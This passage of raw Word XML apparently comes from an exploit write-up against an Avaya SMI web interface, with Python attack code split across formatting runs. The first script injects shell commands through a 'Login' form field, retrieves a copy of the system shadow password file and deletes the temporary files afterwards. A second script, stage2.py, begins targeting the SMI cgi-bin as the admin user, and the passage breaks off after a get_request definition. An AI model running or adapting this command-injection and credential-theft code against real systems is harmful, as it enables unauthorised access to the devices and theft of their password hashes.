            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>text.split</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>("\n")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DFE24A6" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="49D0E91E" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            for line in lines[</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>current_lines</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>:]:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E8C04A1" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                if </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>line.strip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>()) &gt; 0:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C9A8170" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                    print(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>line.strip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E645D5D" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0B5E6AB1" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>current_lines</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(lines) - 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="402FBABA" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    except:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="021B54C8" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        pass</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D901CA6" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4CA7FBA6" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>"Removing Results File...")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="636DFD13" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0D929FB7" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">data = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>data_template</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="4D05F2D7" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">data["Login"] = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>inject_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>template.format</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>("rm -f /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/results.txt")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78420741" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="181D510F" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37BB7D73" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    r = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>requests.post</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>upload_url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, headers=headers, data=data, verify=False, timeout=0.1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EC865D1" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">except </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>requests.exceptions</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>.ReadTimeout</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58F6CFE0" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    pass</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F91B31F" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="63917192" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>"Waiting for shadow file to appear...\n")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DBEC88D" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7B20B33E" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>while True:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3089528D" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    r = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>requests.post</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>shadow_url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, headers=headers, verify=False)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F30BCF9" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2BCE5674" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    if </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>r.status</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>_code</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> == 200:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25D76A3F" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        print(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>r.text</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5413BF03" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        break</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1493C4E9" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="03F5EAED" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>time.sleep</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(5)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C423621" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="63235405" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>"Removing shadow copy...")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D5B4152" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="10E5CA26" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">data = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>data_template</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="5A88C1BC" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">data["Login"] = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>inject_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>template.format</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>("rm -f /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/shadow")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B7D3066" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1CB69080" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22D23101" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    r = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>requests.post</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>upload_url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, headers=headers, data=data, verify=False, timeout=0.1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74AEB72C" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">except </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>requests.exceptions</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>.ReadTimeout</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="515DF080" w14:textId="6DB5FB95" w:rsidR="006420A8" w:rsidRPr="006420A8" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C7F4694" w14:textId="5B01759E" w:rsidR="0014600F" w:rsidRDefault="0014600F" w:rsidP="0014600F">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="620A0DDB" w14:textId="34545A7E" w:rsidR="006420A8" w:rsidRPr="006420A8" w:rsidRDefault="006420A8" w:rsidP="0014600F">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006420A8">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>stage2.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1FA51E" w14:textId="7F0E5306" w:rsidR="006420A8" w:rsidRDefault="006420A8" w:rsidP="0014600F">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="006420A8" w14:paraId="1A4ED8B7" w14:textId="77777777" w:rsidTr="006420A8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3C452EAB" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>#!/</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>usr/bin/python</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="451C3342" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="65E73C59" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">import </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>os</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="73030635" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>import subprocess</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56122453" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>import time</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="110874C6" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>import random</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C7483A2" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>import string</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CEA9E10" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">import </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pwd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="7FBEBF33" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>import grp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53B9FD3D" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>import sys</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2134F4CA" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>import re</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="079FA4E1" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="128507C2" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>CGI_BIN = "/opt/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>avaya</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>smi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cgi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>-bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cgi_main</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="148763EA" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>SESSION_PATH = "/var/lib/php/session"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2910B198" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>IP = "127.0.0.1"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0079E6CB" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>USER = "admin"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F97B3AA" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="59D46A42" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="44FD41B0" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>create_random_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>string</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>alphabet, length):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42CDE35D" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    """Utility method to create random strings that works across python versions"""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F984C3C" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="40B197C0" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    return "</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>".join</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="781787A0" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>alphabet[</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>random.randint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">(0, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(alphabet) - 1)] for _ in range(length)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39BAEE06" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="534A4168" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="62BC1BD4" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6584872E" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">def </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>get_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>request</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">path, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sessionid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2842D085" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    """Makes CGI GET requests"""</w:t>
            </w:r>
          </w:p>
